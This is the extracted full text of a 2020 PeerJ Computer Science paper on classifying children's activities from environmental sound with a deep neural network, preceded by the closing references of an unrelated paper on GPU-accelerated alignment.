2007), pages 512–519. Cole Trapnell and Michael C. Schatz. 2009. Optimizing data intensive GPGPU computations for DNA se- quence alignment. Parallel Computing, 35(8-9):429– 440. Moshe Y. Vardi. 2014. Moore’s Law and the sand-heap paradox. Communications of the ACM, 57(5):5. Richard Wilton, Tamas Budavari, Ben Langmead, Sarah Wheelan, Steven L. Salzberg, and Alex Szalay. 2014. Faster sequence alignment through GPU- accelerated restriction of the seed-and-extend search space. http://dx.doi.org/10.1101/007641. Youngmin Yi, Chao-Yue Lai, Slav Petrov, and Kurt Keutzer. 2011. Efficient parallel CKY parsing on GPUs. In Proceedings of the 12th International Conference on Parsing Technologies, pages 175–185. Ying Zhang and Stephan Vogel. 2005. An efficient phrase-to-phrase alignment model for arbitrarily long phrase and large corpora. In Proceedings of the Tenth Conference of the European Association for Machine Translation (EAMT-05). 100 http://www.pangeanic.com/knowledge_center/size-translation-industry/ http://www.pangeanic.com/knowledge_center/size-translation-industry/ work_egt7fmczgjgbpjnjxzpgy5npoy ---- Deep artificial neural network based on environmental sound data for the generation of a children activity classification model Deep artificial neural network based on environmental sound data for the generation of a children activity classification model Antonio García-Domínguez1,*, Carlos E. Galvan-Tejada1,*, Laura A. Zanella-Calzada2, Hamurabi Gamboa1, Jorge I. Galván-Tejada1, José María Celaya Padilla3, Huizilopoztli Luna-García1, Jose G. Arceo-Olague1 and Rafael Magallanes-Quintanar1 1 Unidad Académica de Ingeniería Eléctrica, Universidad Autónoma de Zacatecas, Zacatecas, Zacatecas, México 2 LORIA, Université de Lorraine, Nancy, France 3 CONACYT, Universidad Autónoma de Zacatecas, Zacatecas, Zacatecas, México * These authors contributed equally to this work. ABSTRACT Children activity recognition (CAR) is a subject for which numerous works have been developed in recent years, most of them focused on monitoring and safety. Commonly, these works use as data source different types of sensors that can interfere with the natural behavior of children, since these sensors are embedded in their clothes. This article proposes the use of environmental sound data for the creation of a children activity classification model, through the development of a deep artificial neural network (ANN). Initially, the ANN architecture is proposed, specifying its parameters and defining the necessary values for the creation of the classification model. The ANN is trained and tested in two ways: using a 70–30 approach (70% of the data for training and 30% for testing) and with a k-fold cross- validation approach. According to the results obtained in the two validation processes (70–30 splitting and k-fold cross validation), the ANN with the proposed architecture achieves an accuracy of 94.51% and 94.19%, respectively, which allows to conclude that the developed model using the ANN and its proposed architecture achieves significant accuracy in the children activity classification by analyzing environmental sound. Subjects Artificial Intelligence, Data Mining and Machine Learning, Data Science Keywords Children activity recognition, Environmental sound, Machine learning, Deep artificial neural network, Environmental intelligence, Human activity recognition INTRODUCTION Environmental intelligence is an area of artificial intelligence that has made great progress in recent years (Cook, Augusto & Jakkula, 2009), mainly driven by the development of new devices and sensors that facilitate data capture and processing (Stipanicev, Bodrozic & Stula, 2007). Advances in this area have gone hand in hand with the development of the Internet of Things (IoT) (Wortmann & Flüchter, 2015; Li, Da Xu & Zhao, 2015) and Smart Cities (Albino, Berardi & Dangelico, 2015; Arasteh et al., 2016), in which can be found How to cite this article García-Domínguez A, Galvan-Tejada CE, Zanella-Calzada LA, Gamboa H, Galván-Tejada JI, Celaya Padilla JM, Luna-García H, Arceo-Olague JG, Magallanes-Quintanar R. 2020. Deep artificial neural network based on environmental sound data for the generation of a children activity classification model. PeerJ Comput. Sci. 6:e308 DOI 10.7717/peerj-cs.308 Submitted 1 May 2020 Accepted 1 October 2020 Published 9 November 2020 Corresponding author Antonio García-Domínguez, antonio.garcia@uaz.edu.mx Academic editor Pinar Duygulu Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.308 Copyright 2020 García-Domínguez et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.308 mailto:antonio.�garcia@�uaz.�edu.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.308 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ different intelligent systems created to provide services to population. The most recent developments have focused on applications that facilitate the interaction of human beings with their environment, in different areas such as engineering (Gupta et al., 2014; Corno & De Russis, 2016), medicine (Roda et al., 2017; Ziuziański, Furmankiewicz & Sołtysik- Piorunkiewicz, 2014), energy (Robinson, Sanders & Mazharsolook, 2015; Cristani, Karafili & Tomazzoli, 2015), ambient assisted living (Lloret et al., 2015; Blasco et al., 2014; Memon et al., 2014), among others (Al Nuaimi et al., 2015; Hu & Ni, 2017). Many of the projects developed and implemented in this area rely on human activity recognition (HAR) systems, which base their operation on the use of different sensors as a data source to determine the activity that a person or group of people are performing and with this information provide some kind of service (Alahi et al., 2016; Uddin, 2019; Cippitelli et al., 2016; Burbano & Carrera, 2015; Ignatov, 2018; Rafferty et al., 2017). In works related to human activity recognition and classification, different data sources have been used to collect information about the activity to be analyzed. The most common data sources used are video (Caba Heilbron et al., 2015; Boufama, Habashi & Ahmad, 2017), audio (Liang & Thomaz, 2019; Galván-Tejada et al., 2016), Radio Frequency Identification (RFID) devices (Li et al., 2016; Wang & Zhou, 2015) and smartphones sensors (Wang et al., 2016), such as the accelerometer (Lee, Yoon & Cho, 2017). Another important aspect to consider is the group of people to whom the study is directed, since the type of data source to use, the techniques and algorithms used depend on it. Most applications on human activity recognition and classification are designed considering adults as the group of interest (Reyes-Ortiz et al., 2016; Hammerla, Halloran & Plötz, 2016; Concone, Re & Morana, 2019; Brophy et al., 2020; Lyu et al., 2017). Another group of people for which works are commonly developed are the elderly, especially for automatic assisted living and health care (Capela, Lemaire & Baddour, 2015; Sebestyen, Stoica & Hangan, 2016; De la Concepción et al., 2017). Children are a group for which it is also common to develop applications for monitoring and safety (Mannini et al., 2017; Kurashima & Suzuki, 2015; Trost et al., 2018). The children’s activities recognition and classification is a topic that has attracted the attention of many researchers due to the implications and variables involved. There are several factors to consider such as: (1) Number of individuals. The number of children acting simultaneously is undoubtedly an important aspect to be considered, since the complete design of the system changes if activities for 1, 2, 3 or a group of children are analyzed. (2) Age of children. Because the activities that children perform are related to their age, the set of activities considered for the analysis changes for each defined group of children. (3) Place of analysis of activities. The environment in which the activity analysis is performed is also an important factor to be considered, since there are external factors that can affect some processes (e.g., a noisy environment would affect the data capture process when working on human activity recognition using environmental sound). And (4) Data source. The type of data used for the analysis of activities is a fundamental variable for the system, since its entire design depends on this. If you work García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 2/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ with images, audio, video, embedded sensors or audio, the way to act changes in each situation. In the area of children activity recognition and classification common data sources are video cameras, accelerometers and RFID devices (Westeyn et al., 2011; Boughorbel et al., 2010; Shoaib et al., 2015; Mannini et al., 2017). Most of the works presented in this area perform the data capture process using wearable sensors, making it possible to identify 2 types of disadvantages: 1. Interference with the children’s natural behavior. Wearing wearable sensors can cause the children, by their curious instincts, to become distracted by feeling a foreign object to him and not perform activities normally (e.g., crying because they want to remove the sensor). This type of behavior would cause an alteration in the captured data or that these were not representative of the activities commonly performed by the children and that are being subject to analysis. 2. Possible physical damage to sensors. The fact that the sensor is located in one of the clothes or parts of the children’s body makes possible the risk that the sensor may suffer physical damage while the children perform the activities, because they are unpredictable (e.g., to wet or hit a smart watch). The sensors are generally not made for rough use, so improper use or even physical damage could represent inappropriate data capture for the system. To mitigate the problem of using wearable sensors, it is necessary to use a different data source that does not interfere with the analyzed activities, for this purpose sound has been used in some works as data source (Galván-Tejada et al., 2016; Sim, Lee & Kwon, 2015). Capturing audio data has the advantage that the capture device does not necessarily have to be carried by the individual who is performing the activity, but can be located in a nearby place where it does not interfere with the performed activities. In addition, it is not necessary to use special equipment or sensors to capture data, since it is possible to use the microphone present in smartphones. Machine learning is a branch of artificial intelligence that, since its appearance, has been applied to a wide variety of problems due to the good results it has shown in terms of data analysis, especially in classification problems, such as the presented in this work. Machine learning has the particularity of being able to be applied to an endless number of problems, with different types of data to analyze. Different applications based on machine learning for the analysis of audio data have been developed, among the main commercial applications developed are voice assistants, such as Alexa (Hoy, 2018; Kepuska & Bohouta, 2018), Siri (Aron, 2011; Kepuska & Bohouta, 2018) and Cortana (Bhat, Lone & Paul, 2017; Hoy, 2018), for the Amazon, Apple and Microsoft companies respectively, as well as Google’s voice assistant (López, Quesada & Guerrero, 2017). In machine learning, specifically deep neural networks have also been widely used for analysis of audio data, as in WaveNet (Van der Oord et al., 2016), a deep neural network for generating raw audio waveforms. It is also common to find works based on machine García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 3/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ learning focused on audio data classification (Zhang et al., 2019; Zeng et al., 2019; Lu, Zhang & Nayak, 2020; Piczak, 2015; Rong, 2016; Hershey et al., 2017). For the generation of a human activity recognition and classification model, it is necessary to implement a machine learning classification algorithm (Jordan & Mitchell, 2015; Nikam, 2015; Fatima & Pasha, 2017), which after being trained with a set of training data, is able to classify new data among the analyzed classes. Some of the most commonly used classification algorithms in this area are Support Vector Machine (SVM) (Chen et al., 2017), k-Nearest Neighbor (knn) (Paul & George, 2015), Random Forests (RF) (Uddin, Billah & Hossain, 2016), Extra Trees (ET) (Uddin & Uddiny, 2015) and Artificial Neural Networks (ANN) (Ronao & Cho, 2016; Suto & Oniga, 2018; Murad & Pyun, 2017). In recent years there have been numerous works based on ANN focused on the creation of activity recognition models, due to the performance and efficiency they have shown (Ronao & Cho, 2016; Hassan et al., 2018; Jiang & Yin, 2015; Nweke et al., 2018; Lubina & Rudzki, 2015; Myo, Wettayaprasit & Aiyarak, 2019). The accuracy of the classifier model depends on the algorithm used and the analyzed data. When working with audio, it is possible to extract features of the signals to serve as input for the classification algorithms. The number and type of features extracted depends on the application and the type of analysis to be performed. Previously, we presented a work that implemented the classification algorithms SVM, kNN, Random Forests, Extra Trees and Gradient Boosting in the generation of a children activity classification model using environmental sound data, working with a 34-feature set extracted from the audios samples, and the classifier that achieves a higher accuracy was kNN with 100% (Blanco-Murillo et al., 2018). In addition, a work was previously presented where the same classification algorithms mentioned above were analyzed and a 27-feature subset was used for the generation of the models, achieving accuracies greater than 90% (Garca-Domnguez et al., 2019). Continuing the previous works, we also developed a children activity recognition and classification model using environmental sound through a 5-feature subset, chosen by genetic algorithms. In that work, the same classifying algorithms mentioned in the previous works were used and the maximum accuracy obteined was 92% (Garca-Dominguez et al., 2020). In the present work, the architecture of a deep ANN is proposed for its implementation as machine learning algorithm in the generation of a children activity recognition model using environmental sound, in an environmental noise-free environment and analyzing activities of children acting individually. A 34-feature set is extracted from the analyzed dataset, which is used in the generation of the model. The classification model is trained and evaluated in terms of accuracy to obtain the performance of the classification algorithm. Two validation approaches are used: 70–30 split (70% of the data for training and 30% for testing), and a k-fold cross validation. This document is organized as follows: the materials and methods are described in detail in “Materials and Methods”. In “Experiments and Results” the experiments performed and the results obtained are reported. The discussion and conclusions are described in “Conclusions”. Finally, future work is presented in “Future Work”. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 4/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ MATERIALS AND METHODS This section describes in detail the used dataset, made up of audio recordings of the different activities to be analyzed, as well as the extracted features used to generate the classification model. Likewise, the methodology used throughout the experimentation is described. For the design and implementation of the deep ANN presented in this work, the Python programming language is used (Van Rossum, 2007), through the Keras (Chollet, 2018) library, an API (Application Programming Interface) of high-level ANN, and the Tensorflow Abadi et al. (2016) library, which is the most widely used deep learning platform today. Dataset description The data set used for this work is the same as the used in previous works about children activity recognition (Garca-Domnguez et al., 2019, 2020) and no extra processing was done. The audios analyzed belong to four different activities, shown in Table 1. As shown in Delgado-Contreras et al. (2014), Tarzia et al. (2011), 10-s audio clips seem to be long enough to obtain potentially useful information in the process of classifying activities by analyzing environmental sound. In the dataset used, the audio recordings with a duration greater than 10 s were divided to generate a greater number of samples. For the analysis of the activities, 10-s samples are taken. Each of the audio recordings in the dataset used belongs to a single activity, so the produced 10-s clips also belong to a single activity. Table 2 shows the number of audio recordings and 10-s samples that the dataset has for each activity to be analyzed. As shown in Table 2, the dataset used for the presented work consists of 2,716 10-s audio clips and the amount of audios per class is balanced (22.23%, 25.88%, 25.47% and 26.39% crying, playing, running and walking, respectively). There is no rule to define the Table 1 General description of activities. Activity Description Crying Emitting crying sound in reaction to some event Playing Handling plastic pieces Running Moving quickly from one place to another Walking Moving from one place to another at medium speed Table 2 Recordings and audio clips per activity. Activity Generated Taken from Internet Total Recordings Clips Recordings Clips Recordings Clips Crying 8 72 33 532 41 604 Playing 9 67 17 636 26 703 Running 9 81 30 611 39 692 Walking 10 65 30 652 40 717 García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 5/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ minimum size of a dataset analyzed using machine learning techniques, the only general recommendation is that it be as large as possible, but that is in particular for each case and type of generated model (e.g., Barbedo (2018) analyzed the size of the dataset for plant disease classification, Dutta & Gros (2018) did it for the classification of medical images and Oyedare (Oyedare & Park, 2019) did it for the classification of transmitters through deep learning). And precisely one of the points to perform as future work for the present work is an analysis of the dataset and consider expanding it if necessary. For the feature extraction process, a set of numerical features are extracted from the 10-s intervals of the audio signals, these features are shown in Table 3. These 34 extracted features are those commonly used in audio analysis and activity recognition through audio (Scheirer, 1998; Wang et al., 2003), especially the mel-frequency spectral coefficients, since many audio analysis works that make use of them have been developed (Galván-Tejada et al., 2016; Stork et al., 2012; Mascia et al., 2015). This set of features was extracted using Python programming language (Van Rossum, 2007). Artificial neural networks An ANN is a model based on the neural structure of the brain, which basically learns from experience. This type of models learn to perform tasks using sample data, without the need to be programed with a specific task. An ANN is composed by nodes called neurons connected to each other. Each of these connections, called edges, are channels that can transmit information from one neuron to another (Monteiro et al., 2017). These edges, regularly, are associated with a real number, called weight, which increases or decreases the signal that passes through the edges and affects the input to the next neuron. The way to calculate the output of the neurons is by some non-linear function of the sum of their inputs. In Fig. 1 the parts of an artificial neuron are shown, the inputs are represented by Xi, and the weights associated with each edge by wi, also within the neuron the transfer and activation functions with which the output is calculated are represented. Table 3 Extracted features. Feature ID Feature name 1 Zero crossing rate 2 Energy 3 Entropy of energy 4 Spectral centriod 5 Spectral spread 6 Spectral entropy 7 Spectral flux 8 Spectral rollof 9–21 MFCCs 22–33 Chroma vector 34 Chroma deviation García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 6/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ ANN are made up of layers, which can have different types of transformations in their inputs. There are two fully identified layers: the input layer and the output layer (Kia et al., 2012). Therefore, the data travels from the input layer to the output layer, going through the different intermediate layers, called hidden layers. Figure 2 shows an example of a simple ANN. The number of nodes in the input layer is determined by the number of input data (Monteiro et al., 2017). The data is processed in the hidden layers and the output layer. There is no fixed or recommended number for hidden layers or for their number of nodes, they are regularly tested by trial and error, depending on the application for which the ANN is being designed. When the number of hidden layers is large, as well as the number of nodes in them, it is said that there is a deep ANN. In the same way, the number of nodes in the output layer is determined by the problem to which the ANN applies, in Figure 1 Parts of an artificial neuron (Xi represents the inputs, wi represents the weights). Full-size DOI: 10.7717/peerj-cs.308/fig-1 Figure 2 Example of an ANN. Full-size DOI: 10.7717/peerj-cs.308/fig-2 García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 7/22 http://dx.doi.org/10.7717/peerj-cs.308/fig-1 http://dx.doi.org/10.7717/peerj-cs.308/fig-2 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ multiclass problems the number of nodes in the output layer corresponds to the number of classes to predict. Deep artificial neural network architecture The ANN architecture definition refers to the structure of the number of layers and nodes contained. There are not strict rules to define the number of hidden layers and the number of nodes, that depends on the problem in which the ANN is implemented and this data is determined by trial and error. One way to select the parameters of ANN, such as the number of nodes and hidden layers, has been to adjust them manually or relying on very deep networks (Simonyan & Zisserman, 2014) that have proved effective in other applications, with the disadvantage of the cost in memory that it implies that the ANN is not optimized for the particular problem and some of these parameters can be redundant (Alvarez & Salzmann, 2016). Neural network model An ANN model is composed by four mainly concepts described in detail below. Type of model When using the Keras interface for the implementation of an ANN in Python, it is necessary to specify the type of model to be created. There are two ways to define Keras models: Sequential and Functional (Ketkar, 2017). A sequential model refers to the fact that the output of each layer is taken as the input of the next layer, and it is the type of model developed in this work. Activation function The activation function is responsible for returning an output from an input value, usually the set of output values in a given range such as (0, 1) or (−1, 1). The types of activation functions most commonly used in ANN are: � Sigmoid: This function transforms the values entered to a scale (0, 1), where high values tend asymptotically to 1 and very low values tend asymptotically to 0 (Karlik & Olgac, 2011), as shown in Eq. (1). f ðxÞ ¼ 1 1 � e�x (1) � ReLU-Rectified Linear Unit: This function transforms the entered values by canceling the negative values and leaving the positive ones as they enter (Yarotsky, 2017), as shown in Eq. (2). f ðxÞ ¼ maxð0; xÞ ¼ � 0 for x , 0 x for x � 0 � (2) � Softmax: This function transforms the outputs into a representation in the form of probabilities, such that the sum of all the probabilities of the outputs is 1. It is used to normalize multiclass type (Liu et al., 2016), as shown in Eq. (3). García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 8/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ f ðzÞj ¼ ezjPk k¼1 e zk (3) Optimization algorithm The goal of optimization algorithms is to minimize (or maximize) an objective E(x) function that is simply a mathematical function that depends on the internal learning parameters of the model that are used to calculate the objective (Y) values of the set of predictors (X) used in the model. The most commonly used optimization algorithms in ANN are Gradient Descent and Adam (Ruder, 2016; Kingma & Ba, 2014). Loss function The loss function, also known as the cost function, is the function that indicates how good the ANN is. A high result indicates that the ANN has poor performance and a low result indicates that the ANN is performing positively. This is the function that is optimized or minimized when back propagation is performed. There are several mathematical functions that can be used, the choice of one depends on the problem that is being solved. Some of these functions are: � Cross-Entropy: Cross-entropy loss, or log loss, measures the performance of a classification model whose output, y, is a probability value, p, between 0 and 1, and it is calculated with Eq. (4). Cross-entropy loss increases as the predicted probability diverges from the actual label. This function is used for classification problems (Rubinstein & Kroese, 2013). �ðy logðpÞ þ ð1 � yÞ logð1 � pÞÞ (4) � Categorical Cross-Entropy: Also called Softmax Loss (Koidl, 2013). It is a Softmax activation plus a Cross-Entropy loss and it is calculated with Eq. (5), where the double sum is over the observations i, whose number is N, and the categories c, whose number is C. The term 1yi ∈ Cc is the indicator function of the ith observation belonging to the cth category. The pmodel[yi ∈ Cc] is the probability predicted by the model for the ith observation to belong to the cth category. When there are more than two categories, the ANN outputs a vector of C probabilities, each giving the probability that the network input should be classified as belonging to the respective category. When the number of categories is just two, the neural network outputs a single probability ŷi, with the other one being 1 minus the output. This is why the binary cross entropy looks a bit different from categorical cross entropy, despite being a special case of it. � 1 N XN i¼1 XC c¼1 1yi2Cc log pmodel yi 2 Cc½ � (5) � Mean Squared Error: Mean Square Error (MSE) is the most commonly used regression loss function (Christoffersen & Jacobs, 2004). MSE is the sum of squared distances García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 9/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ between our target variable and predicted values, and it is calculated with Eq. (6), where n represents the number of samples and ŷi represents the predicted value. MSE ¼ Pn i¼1 ðyi � ŷiÞ2 n (6) EXPERIMENTS AND RESULTS The dataset used in this work is contained by 2,672 10-s audio samples, with 34 extracted features from each sample. Two validation approaches were used: 70–30 split and a k-fold cross validation. For the 70–30 split approach, a training subset and a testing subset are randomly selected, contained by 70% and 30% of the data, respectively (The approach of 70% for training and 30% for testing is used in this area as valid, as proposed by Balli, Sağbaș & Peker (2019), Taylor et al. (2020) and Sousa Lima et al. (2019)). Table 4 shows the number of audio samples in each subset for this case. For the k-fold cross-validation, k = 10 was selected, since it is an approach used in works on human activity recognition to estimate an average accuracy and evaluate the model performance, as in the works presented by Altun & Barshan (2010), Dehghani, Glatard & Shihab (2019), and Jordao et al. (2018). Table 5 shows the number of audio samples in the training and test subsets using the 10-fold cross-validation approach. The ANN architecture is the most important aspect to define, since it directly impacts the accuracy achieved by the network. As mentioned earlier, there are no rules to choose the parameters of the architecture since these are conditioned to the type of application that is given to the ANN and they are determined by trial and error. Table 6 shows the proposed architecture of the deep ANN used in this work. The selected parameters for the ANN architecture, as well as the characteristics of the dataset (classes balanced in quantity, proportion of the size of the testing and training subsets, number of features), ensure that no overfitting appears for the generated model, based on the obtained results, so no dropout layers were used. In Table 7 the selected parameters for the development and implementation of the model in the Keras interface with Python are presented. For the choice of the used parameters in the model implementation, those that best adapt to the type of problem in which they are being applied (multiclass classification) were taken and some of them are present by default in the keras interface, considering that they are generally the ones that achieve the best performing (e.g., the ReLU activation function is the most successful and widely used activation function (Ramachandran, Zoph & Le, 2017)). The ANN model created with the described architecture and parameters was implemented, executed and validated in the Python programming language. As mentioned above, two validation approaches were used to evaluate the performance of the model. For the 70–30 split approach, Fig. 3 shows the accuracy achieved by the model over epochs, where can be observed that the accuracy achieved for the classification of children’s activities using environmental sound is 0.9979 for training data and 0.9451 for testing data. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 10/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ In Fig. 3 it can be observed that the curves representing the model accuracy (training and testing accuracy) periodically spikes down, which is a consequence of the training process being stuck in local regions, due to the optimization parameters used (The Adam Table 4 Size of training and test data sets for the 70–30 validation approach. Total samples Training data samples Test data samples 2,672 1,870 802 Table 5 Size of training and test data sets for the 10-fold cross-validation approach. Total samples Training data samples Test data samples 2,672 2,404 268 Table 6 Proposed ANN architecture. Inputs Hidden layers Neurons per layer Outputs Batch size Epochs 34 8 20 4 64 200 Table 7 Selected model parameters. Type of model Sequential Input layer activation function Relu Hidden layers activation function Relu Output layer activation function Softmax Loss function Categorical crossentropy Optimization algorithm Adam Figure 3 Accuracy behavior during ANN training and testing for the 70–30 split approach. Full-size DOI: 10.7717/peerj-cs.308/fig-3 García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 11/22 http://dx.doi.org/10.7717/peerj-cs.308/fig-3 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ optimization function was used, with the default parameters (Keras Team, 2020). Figure 4 shows the loss presented by the ANN, where can be observed that the loss for the training data is 0.0018, while for the testing data is 0.4070, which is related to the general evaluation of the ANN and indicates how good it is for the classification. In Fig. 4 it can be observed that the curves representing the model loss (training and testing loss) present irregular spikes, which is due properly to the shape of the analyzed data and the parameters chosen in the network architecture, specifically the Adam optimization function, as mentioned above. From the results obtained by executing the classification model with the 70–30 split approach, it is also possible to analyze the behavior of the model specifically for each of the activities analyzed in this work. Table 8 shows the confusion matrix generated from the execution of the classification model for the testing data. In the confusion matrix it is possible to observe the number of correctly classified audio samples for each activity and the number of wrongly classified samples. For the set of activities analyzed, the crying activity is the one that the model classifies in the best way, with 97.67% accuracy (166 of 170 samples correctly classified). For the second model validation approach, the 10-fold cross-validation, Table 9 shows the accuracy and loss obtained for each fold and Table 10 shows the average scores for all Figure 4 Loss function behavior during ANN training and validation. Full-size DOI: 10.7717/peerj-cs.308/fig-4 Table 8 Confusion matrix for the activity classification model. Cry Play Run Walk Cry 166 4 0 0 Play 7 195 2 1 Run 5 10 185 1 Walk 0 5 9 212 García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 12/22 http://dx.doi.org/10.7717/peerj-cs.308/fig-4 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ folds. In both validation processes of the child activity classification model (70–30 division approach and 10-fold cross-validation) it can be observed that the accuracy is very similar. DISCUSSION Although the substantial contribution of the present work is the presentation of a deep artificial neural network in the generation of a children activity classification model through environmental sound, there are aspects to be considered, such as the fact that the proposed architecture is specific for this model and is susceptible to being optimized. The activities are independent of each other, that is, the analysis does not consider activities that are performed simultaneously. Composite activities would thus require a different analysis to be considered. Another important point is the type of environmental sound with which one works, since this work is based on the fact that the captured audio corresponds to activities performed in environments with little or no external noise, and where only one individual (child) is performing an activity at the same time. Environments with considerable external noise or with several individuals (children) interacting at the same time would require another type of analysis. It is also important to highlight that the results obtained in terms of accuracy for the two model validation approaches implemented in this work are similar, which confirms the performance of the model in the children activity classification using environmental sound. Table 9 Scores per fold in the 10-fold cross-validation approach. Fold Accuracy (%) Loss 1 92.91 0.8315 2 95.14 0.1704 3 92.50 1.1195 4 95.13 0.2525 5 97.00 0.1936 6 94.75 0.3846 7 94.00 0.2480 8 90.63 0.3185 9 93.63 0.6060 10 96.25 0.2308 Table 10 Average scores for all folds in the 10-fold cross-validation approach. Accuracy (%) Loss 94.19 0.4356 García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 13/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ CONCLUSIONS The aim of the present work was to create a children activity classification model using environmental sound as data source, through the design of a deep ANN, a well-known machine learning technique through which it is possible to generate activity recognition models, with significant accuracy. From the results shown in “Experiments and Results”, the following conclusions can be obtained: � Environmental sound can be used to correctly classify children activities. Environmental sound is an effective data source for the generation of models for children activity classification, since it is possible to classify activities based on the analysis of the extracted features from the environmental sound. � Different-type activities are correctly classified. The model correctly classifies activities of different types such as crying, playing, running and walking, unlike other models based on specific types of sensors (e.g., using accelerometers only for activities detectable by movement). � Deep artificial neural networks are efficient in generating children activity classification models through environmental sound. The deep artificial neural network with the proposed architecture correctly classifies children activities with an accuracy of 94%, through the analysis of the extracted features from the environmental sound. � The accuracy of the deep artificial neural network is similar to other machine learning techniques reported. The deep artificial neural network with the architecture proposed in the present work achieves an accuracy similar to that reported in our previous works, with other machine learning techniques: 100% for kNN with 34 features (Blanco- Murillo et al., 2018) and 94.25% for kNN with 27 features (Garca-Domnguez et al., 2019). FUTURE WORK The present work allows us to demonstrate that a deep artificial neural network is an efficient technique in the generation of a children activity classification model, however, some aspects can be worked on in the future. Therefore, we propose as part of future work the analysis of the parameters described in the architecture of the neural network, as well as the consideration of feature selection techniques for the dataset. As for the set of activities analyzed, we also propose as future work the addition of more simple activities, as well as the proposal for the analysis of compound activities, both in controlled and uncontrolled environments. The proposed future work is: � To analyze the parameters described in the architecture of the proposed deep artificial neural network with the aim of performing an optimization that allows increasing the accuracy in the classification of the activities. � To include feature selection techniques to reduce the size of the dataset with which the deep artificial neural network works and this can favorably impact the performance García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 14/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ of the model. This is important especially when working with models that are implemented in mobile devices with limited resources. � To analyze the dataset size and the number of instances per class to ensure optimal training of the model and expand it if necessary. � To increase the set of activities analyzed by adding additional activities that are performed by children, which will allow the model to be more robust. � To propose the type of analysis to be performed in the case of compound activities. � To analyze the methods and techniques to be used to classify children activities through environmental sound in uncontrolled environments with outside noise. � To design a practical application on a specific scenario where the generated classification model can be applied considering the points to work mentioned above. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Antonio García-Domínguez conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � Carlos E. Galvan-Tejada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � Laura A. Zanella-Calzada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � Hamurabi Gamboa performed the experiments, analyzed the data, prepared figures and/ or tables, and approved the final draft. � Jorge I. Galván-Tejada analyzed the data, prepared figures and/or tables, and approved the final draft. � José María Celaya Padilla analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. � Huizilopoztli Luna-García performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Jose G. Arceo-Olague performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � Rafael Magallanes-Quintanar performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. García-Domínguez et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.308 15/22 http://dx.doi.org/10.7717/peerj-cs.308 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Raw data are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.308#supplemental-information. REFERENCES Abadi M, Barham P, Chen J, Chen Z, Davis A, Dean J, Devin M, Ghemawat S, Irving G, Isard M, Kudlur M, Levenberg J, Monga R, Moore S, Murray DG, Steiner B, Tucker P, Vasudevan V, Warden P, Wicke M, Yu Y, Zheng X, Brain G. 2016. Tensorflow: a system for large-scale machine learning. In: 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 16), 265–283. Al Nuaimi E, Al Neyadi H, Mohamed N, Al-Jaroodi J. 2015. Applications of big data to smart cities. Journal of Internet Services and Applications 6(1):25 DOI 10.1186/s13174-015-0041-5. Alahi A, Goel K, Ramanathan V, Robicquet A, Fei-Fei L, Savarese S. 2016. Social lstm: human trajectory prediction in crowded spaces. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. Piscataway: IEEE, 961–971. Albino V, Berardi U, Dangelico RM. 2015. Smart cities: definitions, dimensions, performance, and initiatives. Journal of Urban Technology 22(1):3–21 DOI 10.1080/10630732.2014.942092. Altun K, Barshan B. 2010. Human activity recognition using inertial/magnetic sensor units. In: International Workshop on Human Behavior Understanding, Springer, 38–51. Alvarez JM, Salzmann M. 2016. Learning the number of neurons in deep networks. In: Advances in Neural Information Processing 